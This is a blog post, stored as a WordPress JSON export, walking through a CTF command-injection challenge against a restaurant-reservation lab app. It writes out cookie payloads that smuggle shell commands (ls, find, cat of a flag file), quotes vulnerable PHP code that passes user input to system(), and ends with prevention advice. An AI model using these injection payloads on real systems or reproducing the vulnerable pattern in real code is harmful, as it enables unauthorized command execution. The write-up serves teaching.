{"id":3701,"date":"2020-07-21T17:31:31","date_gmt":"2020-07-21T12:01:31","guid":{"rendered":"https:\/\/opstree.com\/blog\/\/?p=3701"},"modified":"2025-11-20T15:41:20","modified_gmt":"2025-11-20T10:11:20","slug":"out-of-band-rce-ctf-walkthrough","status":"publish","type":"post","link":"https:\/\/opstree.com\/blog\/2020\/07\/21\/out-of-band-rce-ctf-walkthrough\/","title":{"rendered":"Out-Of-Band RCE: CTF Walkthrough"},"content":{"rendered":"\r\n

So, this is my writeup on how I was able to achieve my first Remote Code Execution. Also after reviewing the code I was able to understand more about malicious code execution via OS functions. Finally, I was able to capture the flag and get the Hall of Fame.<\/p>\r\n

Out of Band(OOB) Command Injection is performed by sending a DNS request to a server, which occurs when input data is interpreted as an operating system command. By this, an attacker can execute arbitrary commands on the system and gain unauthorized access.<\/p>\r\n

<\/p>\r\n\r\n\r\n\r\n

Here, we will see how I was able to solve Out of the band(OOB) RCE like a regular RCE.
The challenge name itself described that it is going to be a Remote Code Execution(RCE), you can learn more about RCE from portswigger academy<\/a>. First, we will try to understand the functionality of the web application. This should be the basic approach to find any vulnerability. This is a reservation app where one can book a table for the restaurant.<\/p>\r\n

[ Are you looking devsecops managed services in usa<\/a> ]<\/strong><\/p>\r\n\r\n\r\n\r\n

Analysis(Using Burpsuite):<\/h2>\r\n\r\n\r\n\r\n
    \r\n
  1. To reserve the table, enter the name in the box at https:\/\/lab.takeover.host\/reserve<\/a><\/li>\r\n<\/ol>\r\n\r\n\r\n\r\n
    \r\n
    \"Main<\/figure>\r\n<\/div>\r\n\r\n\r\n\r\n

    2. Check the reflection of user input.<\/p>\r\n\r\n\r\n\r\n

    \r\n
    \"\"<\/figure>\r\n<\/div>\r\n\r\n\r\n\r\n

    3. Click on \u201cclick to reserve\u201d and check that the table has been reserved.<\/p>\r\n\r\n\r\n\r\n

    \r\n
    \"\"<\/figure>\r\n<\/div>\r\n\r\n\r\n\r\n

     <\/p>\r\n\r\n\r\n\r\n

    \"\"<\/figure>\r\n\r\n\r\n\r\n

    4. Then finally the user can print the receipt.<\/p>\r\n\r\n\r\n\r\n

    \r\n
    \"\"<\/figure>\r\n<\/div>\r\n\r\n\r\n\r\n

    5. Check the response for each of the requests to perform the injection.<\/p>\r\n\r\n\r\n\r\n

    6. Then after injecting multiple payloads, the payload will look like this: name=test; receiptcode=962b16bcd257121; table=T-12\"%3bls%26\"'<\/code><\/p>\r\n\r\n\r\n\r\n

    7. Use the payload: table=T-12\";ls&\"'<\/code> but to make it work, encode using URL encoding.<\/p>\r\n\r\n\r\n\r\n

    \r\n
    \"\"<\/figure>\r\n<\/div>\r\n\r\n\r\n\r\n

    8. Let\u2019s search for the payloadtable=T-12\";find \/ -name flag.txt -exec cat {}\\;&\"'<\/code> and URL encode the value.<\/p>\r\n\r\n\r\n\r\n

    9. To get the flag, enter the payload and URL encode this value in the cookie: table=T-12\";cat \/usr\/lib\/kernel\/flag.txt&\"'<\/code><\/p>\r\n\r\n\r\n\r\n

    \r\n
    \"\"<\/figure>\r\n<\/div>\r\n\r\n\r\n\r\n

    10. The response shows: VULLN{FOUND_FLAG_GIVE_ME_THE_LAB}<\/p>\r\n\r\n\r\n\r\n

    Code review:<\/h2>\r\n\r\n\r\n\r\n

    The different programming language has different powerful OS-communication functions used to execute the command. Below is the list:<\/p>\r\n\r\n\r\n\r\n

      \r\n
    1. system, %x, exec,<\/li>\r\n
    2. shell, sh, shell_exec open,<\/li>\r\n
    3. popen, proc_open call,<\/li>\r\n
    4. subprocess, spawn<\/li>\r\n
    5. passthru, eval<\/li>\r\n<\/ol>\r\n\r\n\r\n\r\n

      The code review for PHP:
      In PHP, there are more functions that let you to execute commands :
      exec: Execute an external program
      passthru: Execute an external program and display raw output
      shell_exec: Execute command via shell and return the complete output as a string
      system: Execute an external program and display the output.
      If in script, exec() is used, you can’t see the command output(but the command is executed) until the result isn’t echoed from script.<\/em><\/p>\r\n\r\n\r\n\r\n

      After receiving a hint on Twitter, it was possible to perform a code review.<\/p>\r\n\r\n\r\n\r\n

      \"Hint<\/figure>\r\n\r\n\r\n\r\n

      Let\u2019s download the source code via http:\/\/lab.takeover.host\/source.zip<\/p>\r\n\r\n\r\n\r\n

      Then performing the code review we can see the system() function which is used to execute OS commands. Primarily, it is used to echo parameter values. For example, here, it is used to echo the values from $content variable to receipts\/$filename.<\/p>\r\n\r\n\r\n\r\n

      \r\n
      \"\"<\/figure>\r\n<\/div>\r\n\r\n\r\n\r\n

      system(\u2018echo -e \u201c\u2018.$content.\u2019\u201d > receipts\/\u2019.$filename);<\/code><\/p>\r\n\r\n\r\n\r\n

      The $content <\/em>variable contains 4 values which are concatenated having a $getname<\/em>, $tablename<\/em>, $price<\/em> and $receiptcode.<\/em><\/p>\r\n\r\n\r\n\r\n

      $content = \u2018Reserved to: \u2018.$getname.\u2019\\n\\nTable: \u2018.$tablename.\u2019\\n\\nPrice: \u2018.$price.\u2019\\n\\nReceipt code: \u2018.$receiptcode;<\/code><\/p>\r\n\r\n\r\n\r\n

      Although there is a clear() function defined which is sanitizing the user input by removing malicious characters from the provided string.<\/p>\r\n\r\n\r\n\r\n

      function clear($input){ return str_replace(array(\u201c|\u201d, \u201c&\u201d, \u201c`\u201d, \u201c$\u201d, \u201c(\u201c, \u201c)\u201d, \u201c;\u201d, \u201c>\u201d, \u201c<\u201d, \u201c\u2018\u201c, \u2018\u201c\u2018, \u201c?\u201d, \u201c=\u201d, \u201c\/\u201d, \u201c\\\u201d), \u201c\u201d, $input); }<\/code><\/p>\r\n\r\n\r\n\r\n

      But this clear() function is not implemented properly. Application calls the clear() function when setting cookies, it also stores our malicious string in $getname variable which is used in system() function.<\/p>\r\n\r\n\r\n\r\n

      $getname = isset($_COOKIE['name']) ? $_COOKIE['name'] : (isset($_POST['name']) ? $_POST['name'] : 0); \r\n\r\nsetcookie(\"name\", clear($getname)); \r\n\r\nif(isset($_GET['table']) or isset($_COOKIE['table'])){ $tablename = isset($_COOKIE['table']) ? $_COOKIE['table'] : $_GET['table'];\r\n\r\n $price = ($tablename == \"T-12\") ? \"80$\" : \"350$\";\r\n \r\nif(!isset($_COOKIE['reserved'])){\r\n\r\n$receiptcode = substr(md5('not so important'.rand()), 0, 15); \r\n\r\nsetcookie(\"receiptcode\", $receiptcode); \r\n}\r\nelse{ \r\n$receiptcode = $_COOKIE['receiptcode']; \r\n} \r\n$filename = $getname.'_'.$receiptcode.\".txt\"; \r\n$content = 'Reserved to: '.$getname.'\\n\\nTable: '.$tablename.'\\n\\nPrice: '.$price.'\\n\\nReceipt code: '.$receiptcode;<\/code><\/pre>\r\n\r\n\r\n\r\n
      The conditional statement used to control flow via system() call uses a conditional operator. Based on if\/else conditions, we will send a POST request with \u2018table\u2019 as GET variable and \u2018name\u2019 as POST variable to get into system() function.
      So, the table is set and when cookies are not set to reserved we can get the malicious input to be executed by system().<\/p>\r\n\r\n\r\n\r\n
      But let\u2019s differentiate between If\/else statement and conditional operator to make things clear.<\/p>\r\n\r\n\r\n\r\n
      (condition) ? \/* value to return if condition is true *\/             : \/* value to return if condition is false *\/ ;<\/code><\/pre>\r\n\r\n\r\n\r\n
      The\u00a0?<\/code> is called the conditional operator because you cannot execute code in the same manner as if we did:<\/p>\r\n\r\n\r\n\r\n
      if (condition) {    \/* condition is true, do something like echo *\/}else {    \/* condition is false, do something else *\/}<\/code><\/pre>\r\n\r\n\r\n\r\n
      In this example, we are executing the echo<\/code> statement when the $address<\/code> is not empty. We can’t do this the same way with the conditional operator. What we can do, however, is echo<\/code> the result of the conditional operator:<\/p>\r\n\r\n\r\n\r\n
      echo empty($address['street2']) ? \"Street2 is empty!\" : $address['street2'];\r\nand this will display \"Street is empty!\" if it is empty, otherwise it will display the street2 address.<\/code><\/pre>\r\n\r\n\r\n\r\n
      \r\n
      \"\"<\/figure>\r\n<\/div>\r\n\r\n\r\n\r\n
       <\/p>\r\n\r\n\r\n\r\n
      Thus we get another way to achieve Remote Code Execution.<\/p>\r\n\r\n\r\n\r\n
      Remote Code Execution(RCE) Preventions<\/h3>\r\n\r\n\r\n\r\n
      The best way is to avoid RCE is by not using system functions. But when working with dynamic data it is a better, safer way to do the same thing. In some programming languages (including PHP) it is possible to disable these functions entirely so that they cannot<\/em> be used.<\/p>\r\n\r\n\r\n\r\n
      If it is impossible, sometimes, to avoid using system functions and more common functions like include\/require then perform source code analysis following below guidelines<\/em><\/p>\r\n\r\n\r\n\r\n
        \r\n
      1. Whitelist actions<\/li>\r\n
      2. Sanitize and validate input<\/li>\r\n
      3. Validate returned data<\/li>\r\n<\/ol>\r\n\r\n\r\n\r\n
        Hall of\u00a0Fame:<\/h3>\r\n\r\n\r\n\r\n
        \r\n
        \"\"<\/figure>\r\n<\/div>\r\n\r\n\r\n\r\n
        Reference:<\/h3>\r\n\r\n\r\n\r\n
        https:\/\/stackoverflow.com\/questions\/1506527\/how-do-i-use-the-ternary-operator-in-php-as-a-shorthand-for-if-else<\/a><\/p>\r\n\r\n\r\n\r\n
        https:\/\/guides.codepath.com\/websecurity\/Remote-Code-Execution<\/a><\/p>\r\n\r\n\r\n\r\n\r\n\r\n
        https:\/\/medium.com\/@Ciph3r00t\/ctf-out-of-band-rce-solution-29251e1de4cd<\/a><\/p>\r\n\r\n\r\n\r\n
        https:\/\/portswigger.net\/web-security\/os-command-injection<\/a><\/p>\r\n
        Related Searches – DevOps solution provider<\/a> | Cloud Security<\/a>\u00a0<\/strong><\/p>\r\n
        \r\n\r\n<\/p>\r\n
        \u00a0<\/div>\r\n","protected":false},"excerpt":{"rendered":"
        So, this is my writeup on how I was able to achieve my first Remote Code Execution. Also after reviewing the code I was able to understand more about malicious code execution via OS functions. Finally, I was able to capture the flag and get the Hall of Fame. Out of Band(OOB) Command Injection is … Continue reading “Out-Of-Band RCE: CTF Walkthrough”<\/span><\/a><\/p>\n","protected":false},"author":184572135,"featured_media":29900,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_coblocks_attr":"","_coblocks_dimensions":"","_coblocks_responsive_height":"","_coblocks_accordion_ie_support":"","jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[28070474],"tags":[61811405,663591,321842,768739286],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/opstree.com\/blog\/wp-content\/uploads\/2025\/11\/DevSecOps-1.jpg","jetpack_likes_enabled":false,"jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/pfDBOm-XH","jetpack-related-posts":[],"_links":{"self":[{"href":"https:\/\/opstree.com\/blog\/wp-json\/wp\/v2\/posts\/3701"}],"collection":[{"href":"https:\/\/opstree.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/opstree.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/opstree.com\/blog\/wp-json\/wp\/v2\/users\/184572135"}],"replies":[{"embeddable":true,"href":"https:\/\/opstree.com\/blog\/wp-json\/wp\/v2\/comments?post=3701"}],"version-history":[{"count":28,"href":"https:\/\/opstree.com\/blog\/wp-json\/wp\/v2\/posts\/3701\/revisions"}],"predecessor-version":[{"id":29931,"href":"https:\/\/opstree.com\/blog\/wp-json\/wp\/v2\/posts\/3701\/revisions\/29931"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/opstree.com\/blog\/wp-json\/wp\/v2\/media\/29900"}],"wp:attachment":[{"href":"https:\/\/opstree.com\/blog\/wp-json\/wp\/v2\/media?parent=3701"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/opstree.com\/blog\/wp-json\/wp\/v2\/categories?post=3701"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/opstree.com\/blog\/wp-json\/wp\/v2\/tags?post=3701"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}